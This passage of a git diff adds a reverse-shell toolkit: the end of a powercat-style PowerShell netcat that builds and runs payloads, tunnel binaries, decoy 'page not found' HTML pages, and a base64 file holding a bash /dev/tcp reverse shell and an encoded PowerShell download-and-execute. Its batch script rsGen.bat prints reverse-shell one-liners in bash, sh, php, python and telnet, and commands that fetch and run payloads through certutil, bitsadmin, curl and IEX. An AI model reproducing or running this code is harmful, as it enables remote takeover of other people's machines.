+ Stream1_Close $Stream1Vars + } + catch + { + Write-Verbose "Failed to close Stream 1" + } + } + } + ########## POWERSHELL FUNCTIONS ########## + + ########## CONSOLE FUNCTIONS ########## + function Setup_Console + { + param($FuncSetupVars) + $FuncVars = @{} + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["Output"] = $FuncSetupVars[0] + $FuncVars["OutputBytes"] = [byte[]]@() + $FuncVars["OutputString"] = "" + return $FuncVars + } + function ReadData_Console + { + param($FuncVars) + $Data = $null + if($Host.UI.RawUI.KeyAvailable) + { + $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n") + } + return $Data,$FuncVars + } + function WriteData_Console + { + param($Data,$FuncVars) + switch($FuncVars["Output"]) + { + "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)} + "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)} + "Bytes" {$FuncVars["OutputBytes"] += $Data} + } + return $FuncVars + } + function Close_Console + { + param($FuncVars) + if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]} + elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]} + return + } + ########## CONSOLE FUNCTIONS ########## + + ########## MAIN FUNCTION ########## + function Main + { + param($Stream1SetupVars,$Stream2SetupVars) + try + { + [byte[]]$InputToWrite = @() + $Encoding = New-Object System.Text.AsciiEncoding + if($i -ne $null) + { + Write-Verbose "Input from -i detected..." + if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } + elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } + elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } + else{Write-Host "Unrecognised input type." ; return} + } + + Write-Verbose "Setting up Stream 1..." + try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} + catch{Write-Verbose "Stream 1 Setup Failure" ; return} + + Write-Verbose "Setting up Stream 2..." 
+ try{$Stream2Vars = Stream2_Setup $Stream2SetupVars} + catch{Write-Verbose "Stream 2 Setup Failure" ; return} + + $Data = $null + + if($InputToWrite -ne @()) + { + Write-Verbose "Writing input to Stream 1..." + try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} + catch{Write-Host "Failed to write input to Stream 1" ; return} + } + + if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return} + + Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." + while($True) + { + try + { + $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars + if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return + } + + try + { + $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars + if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return + } + } + } + finally + { + try + { + #Write-Verbose "Closing Stream 2..." + Stream2_Close $Stream2Vars + } + catch + { + Write-Verbose "Failed to close Stream 2" + } + try + { + #Write-Verbose "Closing Stream 1..." 
+ Stream1_Close $Stream1Vars + } + catch + { + Write-Verbose "Failed to close Stream 1" + } + } + } + ########## MAIN FUNCTION ########## + + ########## GENERATE PAYLOAD ########## + if($u) + { + Write-Verbose "Set Stream 1: UDP" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") + if($l){$InvokeString = "Main @('',`$True,'$p','$t') "} + else{$InvokeString = "Main @('$c',`$False,'$p','$t') "} + } + elseif($dns -ne "") + { + Write-Verbose "Set Stream 1: DNS" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") + if($l){return "This feature is not available."} + else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "} + } + else + { + Write-Verbose "Set Stream 1: TCP" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") + if($l){$InvokeString = "Main @('',`$True,$p,$t) "} + else{$InvokeString = "Main @('$c',`$False,$p,$t) "} + } + + if($e -ne "") + { + Write-Verbose "Set Stream 2: Process" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + 
${function:ReadData_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n") + $InvokeString += "@('$e')`n`n" + } + elseif($ep) + { + Write-Verbose "Set Stream 2: Powershell" + $InvokeString += "`n`n" + } + elseif($r -ne "") + { + if($r.split(":")[0].ToLower() -eq "udp") + { + Write-Verbose "Set Stream 2: UDP" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") + if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} + elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} + else{return "Bad relay format."} + } + if($r.split(":")[0].ToLower() -eq "dns") + { + Write-Verbose "Set Stream 2: DNS" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") + if($r.split(":").Count -eq 2){return "This feature is not available."} + elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")} + else{return "Bad relay format."} + } + elseif($r.split(":")[0].ToLower() -eq "tcp") + { + Write-Verbose "Set Stream 2: TCP" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") + 
$FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") + if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} + elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} + else{return "Bad relay format."} + } + } + else + { + Write-Verbose "Set Stream 2: Console" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n") + $InvokeString += ("@('" + $o + "')") + } + + if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")} + else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")} + $InvokeString = ($FunctionString + $InvokeString) + ########## GENERATE PAYLOAD ########## + + ########## RETURN GENERATED PAYLOADS ########## + if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))} + elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString} + ########## RETURN GENERATED PAYLOADS ########## + + ########## EXECUTION ########## + $Output = $null + try + { + if($rep) + { + while($True) + { + $Output += IEX $InvokeString + Start-Sleep -s 2 + Write-Verbose "Repetition Enabled: Restarting..." 
+ } + } + else + { + $Output += IEX $InvokeString + } + } + finally + { + if($Output -ne $null) + { + if($of -eq ""){$Output} + else{[io.file]::WriteAllBytes($of,$Output)} + } + } + ########## EXECUTION ########## +} diff --git a/include/pgrok.exe b/include/pgrok.exe new file mode 100644 index 0000000..1848f62 Binary files /dev/null and b/include/pgrok.exe differ diff --git a/include/www/404.html b/include/www/404.html new file mode 100644 index 0000000..b784469 --- /dev/null +++ b/include/www/404.html @@ -0,0 +1,167 @@ + + + + + 无法访问此页面 + + + + + +
+
无法访问此页面
+
+ + +
+
+ + + + +
+ 详细信息 +
+
+

找不到此网站。

+

错误代码: INET_E_RESOURCE_NOT_FOUND

+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/include/www/i b/include/www/i new file mode 100644 index 0000000..b152d8c --- /dev/null +++ b/include/www/i @@ -0,0 +1 @@ +L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAOgA4ADAALwBwAGMAYQB0AC4AcABzADEAJwApADsAcABjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgAxAC4AMQAgAC0AcAAgADgAOAA4ADgAIAAtAGUAIABjAG0AZAA= diff --git a/include/www/index.html b/include/www/index.html new file mode 100644 index 0000000..b784469 --- /dev/null +++ b/include/www/index.html @@ -0,0 +1,167 @@ + + + + + 无法访问此页面 + + + + + +
+
无法访问此页面
+
+ + +
+
+ + + + +
+ 详细信息 +
+
+

找不到此网站。

+

错误代码: INET_E_RESOURCE_NOT_FOUND

+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/rsGen.bat b/rsGen.bat new file mode 100644 index 0000000..8f22559 --- /dev/null +++ b/rsGen.bat 
@@ -0,0 +1,813 @@ +@if (@rsgen) == (@RSGEN) @end /***** JS +@echo off +title rsGen - Reverse Shell Command Genrator by Flyfish + +::main +:rs_main_start +setlocal enableDelayedExpansion +call :rs_os_detect_start +if "%~1" equ "" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + goto rs_help_start +) else ( + set rs_listen_host= + set rs_listen_host=%~1 + + if "%~2" equ "" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo,&echo -Missing port argument + ) else ( + call :rs_banner_w7_start + echo, + powershell -c write-host "' - Missing port argument'" -f red -n 2>nul + ) + goto rs_help_start + ) else ( + set rs_listen_port= + set rs_listen_port=%~2 + + if /i "%2"=="-ngrok" ( + set rs_ngrok= + set rs_listen_port=%~1 + + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + + call :rs_local_listen_start %~1 + call :rs_ngrok_start + + if !rs_ngrok! == 0 ( + call :rs_command_generate_pub_start !rs_ngrok_host! !rs_ngrok_port! + ) else ( + powershell -c write-host "' - Get ngrok tunnel url timeout.'" -f red -n 2>nul + echo, + goto :eof + ) + + if "!rs_os_flag!"=="W10" ( + call :rs_info_w10windows_start + call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_info_w7windows_start + call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 
+ call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + + ) + + if /i "%2"=="-pgrok" ( + set rs_pgrok= + set rs_listen_port=%~1 + + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + + call :rs_local_listen_start %~1 + call :rs_pgrok_start + + if !rs_pgrok! == 0 ( + call :rs_command_generate_pub_start !rs_pgrok_host! !rs_pgrok_port! + ) else ( + powershell -c write-host "' - Get pgrok tunnel url timeout.'" -f red -n 2>nul + echo, + goto :eof + ) + + if "!rs_os_flag!"=="W10" ( + call :rs_info_w10windows_start + call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_info_w7windows_start + call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + + ) + + call :rs_check_port_start !rs_listen_port! 
+ if "!rs_value_type!"=="1" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo,&echo -Wrong port argument + ) else ( + call :rs_banner_w7_start + echo, + powershell -c write-host "' - Wrong port argument'" -f red -n 2>nul + ) + goto rs_help_start + ) else ( + set rs_webport=80 + + if not "%3"=="" ( + for %%i in (%3 %4 %5 %6 %7 %8) do ( + if /i "%%i"=="-pub" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo + Host:Port ^<==^> %~1:%~2 + call :rs_command_generate_pub_start %~1 %~2 + call :rs_info_w10windows_start + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_banner_w7_start + echo + Host:Port ^<==^> %~1:%~2 + call :rs_command_generate_pub_start %~1 %~2 + call :rs_info_w7windows_start + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + ) + if /i "%%i"=="-lan" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + call :rs_command_lan_start %~1 %~2 + ) + if /i "%%i"=="-listen" ( + call :rs_local_listen_start %~2 + ) + + if /i "%%i"=="-ngrok" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + echo Please try "%~nx0 -ngrok" + goto rs_help_start + ) + + if /i "%%i"=="-pgrok" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + echo Please try "%~nx0 -pgrok" + goto rs_help_start + ) + ) + + ) else ( + if not "%2"=="-ngrok" ( + if not "%2"=="-pgrok" ( + if "!rs_os_flag!"=="W10" ( + echo + Host:Port ^<==^> %~1:%~2 + call :rs_info_w10windows_start + call :rs_windows_command_raw_start %~1 %~2 + call :rs_info_w10linux_start + call 
:rs_linux_command_raw_start %~1 %~2 + ) else ( + echo + Host:Port ^<==^> %~1:%~2 + call :rs_info_w7windows_start + call :rs_windows_command_raw_start %~1 %~2 + call :rs_info_w7linux_start + call :rs_linux_command_raw_start %~1 %~2 + ) + ) + ) + ) + + call :rs_clean_tempfile_start + ) + ) +) +endlocal +goto :eof +:rs_main_end + +::Detect system version using ANSI color +:rs_os_detect_start +for /f "tokens=4-7 delims=[]. " %%i in ('ver') do ( + set /a_majorminor=%%i * 100 + %%j + set /a_build=%%k0 /10 + set /a_revision=%%l0 /10 +) +set "rs_os_flag=" +if %_majorminor% geq 1000 ( + if %_build% gtr 10586 ( + set rs_os_flag=W10 + ) +) else ( + set rs_os_flag=-1 + if %_build% equ 10586 ( + if %_revision% geq 11 ( + set rs_os_flag=W10 + ) + ) +) +:rs_os_detect_end + +::Check port format +:rs_check_port_start +set rs_value= +set rs_value=%1 +echo %rs_value%|findstr "^[0-9]*$">nul +if %errorlevel% equ 0 ( + set rs_value_type=0 +) else ( + set rs_value_type=1 +) +goto :eof +:rs_check_prot_end + +::Find available ports +:rs_set_webport_start +netstat -o -n -a | find /i "LISTENING" | find ":%rs_webport% " > NUL +if "%ERRORLEVEL%" equ "0" ( + set /a rs_webport +=1 + goto rs_set_webport_start +) else ( + set rs_webport=%rs_webport% +) +goto :eof +:rs_set_webport_end + +::base64 encode +:rs_base64_encode_start +set /p"%temp%\rs_temp_input.rsg" +certutil -f -encode "%temp%\rs_temp_input.rsg" "%temp%\rs_temp_output.rsg">nul +for /f %%i in ('findstr /b /c:"-" /v "%temp%\rs_temp_output.rsg"') do ( + set "rsgen_b64_res=%%i" +) +:rs_base64_encode_ende + +::Clean temporary files +:rs_clean_tempfile_start +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +if exist "%temp%\rs_temp_output.rsg" del /q %temp%\rs_temp_output.rsg +goto :eof +:rs_clean_tempfile_end + +::Listen to the local port +:rs_local_listen_start +set rs_listen_port= +set rs_listen_port=%1 +if exist "%cd%\include\pcat.ps1" ( + echo + Listening on port 0.0.0.0:!rs_listen_port! 
+ start "Listening port !rs_listen_port!" cmd /c powershell -ep bypass -c "Import-Module %cd%\include\pcat.ps1;pcat -l -p !rs_listen_port! -v -t 600" 2>nul +) else ( + powershell -c write-host "' - Unable to start listening,Missing file %cd%\include\pcat.ps1.'" -f red -n 2>nul + goto rs_help_start +) + +goto :eof +:rs_local_listen_end + +::rs_ngrok +:rs_ngrok_start +if exist "%cd%\include\ngrok.exe" ( + taskkill /f /im ngrok.exe >nul 2>nul + start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\ngrok.exe tcp !rs_listen_port! -config=%cd%\include\ngrok.yml 2>nul + + set rs_ngrok= + set rs_n=0 + FOR /L %%i in (1,1,30) do ( + set /a rs_n=!rs_n!+1 + %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0 + if !rs_ngrok! == 0 goto :rs_ngrok_host + ) + + :rs_ngrok_host + if !rs_ngrok! == 0 ( + FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_host=%%i) + FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_port=%%i) + + set rs_listen_host= + set rs_listen_host=!rs_ngrok_host! + echo + Starting the ngrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_ngrok_host!:!rs_ngrok_port! + rem echo !rs_ngrok_host! + rem echo !rs_ngrok_port! + rem echo !rs_n! time... + ) + goto :eof + +) else ( + echo, + powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\ngrok.exe.'" -f red -n 2>nul + goto :rs_help_start +) +goto :eof +:rs_ngrok_end + +::rs_pgrok +:rs_pgrok_start +if exist "%cd%\include\pgrok.exe" ( + taskkill /f /im pgrok.exe >nul 2>nul + start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\pgrok.exe -proto=tcp !rs_listen_port! 
2>nul + + set rs_pgrok= + set rs_n=0 + FOR /L %%i in (1,1,30) do ( + set /a rs_n=!rs_n!+1 + %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in|find /i "ejemplo.me" >nul&&set rs_pgrok=0 + if !rs_pgrok! == 0 goto :rs_pgrok_host + ) + + :rs_pgrok_host + if !rs_pgrok! == 0 ( + FOR /F tokens^=11^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_host=%%i) + FOR /F tokens^=12^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_port=%%i) + + set rs_listen_host= + set rs_listen_host=!rs_pgrok_host! + echo + Starting the pgrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_pgrok_host!:!rs_pgrok_port! + rem echo "!rs_pgrok_host!" "!rs_pgrok_port!" + rem echo !rs_n! time... + ) + goto :eof + +) else ( + echo, + powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\pgrok.exe.'" -f red -n 2>nul + goto :rs_help_start +) +goto :eof +:rs_pgrok_end + +::Raw command format output +:rs_windows_command_raw_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +if "!rs_os_flag!"=="W10" ( + echo  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, +) else ( + echo powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! 
-e cmd +) +goto :eof +:rs_windows_command_raw_end + +:rs_linux_command_raw_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +if "!rs_os_flag!"=="W10" ( + echo  bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo  sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo  0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 + echo, + echo  telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 + ::echo  ps:Need to additionally listen a port 1521 for command output display + echo, + echo  php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' + echo, + echo  python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' + echo, +) else ( + echo bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo 0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 + echo, + echo telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 
1521 + ::echo ps:Need to additionally listen a port 1521 for command output display + echo, + echo php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' + echo, + echo python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' + echo, +) +goto :eof +:rs_linux_command_raw_end + +::LAN "transfer command" generation +:rs_command_lan_start +if not exist "%cd%\include\" ( + echo, + powershell -c write-host "' - Missing include directory,Unable to continue generate command!'" -f red -n >nul + ::Missing the include directory, the include directory contains the files "i" & "pcat.ps1", "i" is the generated command. + goto rs_help_start +) +if exist "%cd%\include\mongoose.exe" ( + tasklist|find /i "mongoose.exe">nul&&taskkill /f /im mongoose.exe >nul 2>nul + call :rs_set_webport_start + start %cd%\include\mongoose.exe -d %cd%\include\www -l !rs_webport! -start_browser no -enable_dir_listing no + rem mongoose.exe -d %cd%\www -l 80 -start_browser yes -enable_dir_listing no +) else ( + powershell -c write-host "' - Missing file `"%cd%\include\mongoose.exe`",The web service failed to start`,the LAN mode needs to start the web service locally`,so the command will not be executed effectively'" -f red -n 2>nul +) +set "rs_ps_command_pre_lan=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " +set "ps_command_suf_raw_lan=IEX (New-Object System.Net.Webclient).DownloadString(''http://%rs_listen_host%:%rs_webport%/pcat.ps1'');pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd" +set "linux_command_raw_lan=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" +call :rs_base64_encode_start "!linux_command_raw_lan!" 
+set rs_linux_command_b64_lan=%rsgen_b64_res% +powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw_lan%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg" +set /p rs_ps_command_suf_b64_lan=<%temp%\rs_temp_input.rsg +set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_suf_b64_lan!" +echo !rs_command_b64_lan!>%cd%\include\www\i +call :rs_http_post_start "!rs_listen_host!" "%temp%\rs_temp_output.rsg" +set /p rs_ip2dec=<%temp%\rs_temp_output.rsg +if "!rs_os_flag!"=="W10" ( + if "!rs_webport!" equ "80" ( + set rs_webport_display= + ) else ( + set "rs_webport_display=:%rs_webport%" + ) + call :rs_info_w10windows_start + echo  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, + echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat + echo, + echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^ + echo, + echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat + echo, + + call :rs_info_w10linux_start + echo  curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  wget -qO- http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + + call :rs_info_wlinux10_start + echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  bitsadmin 
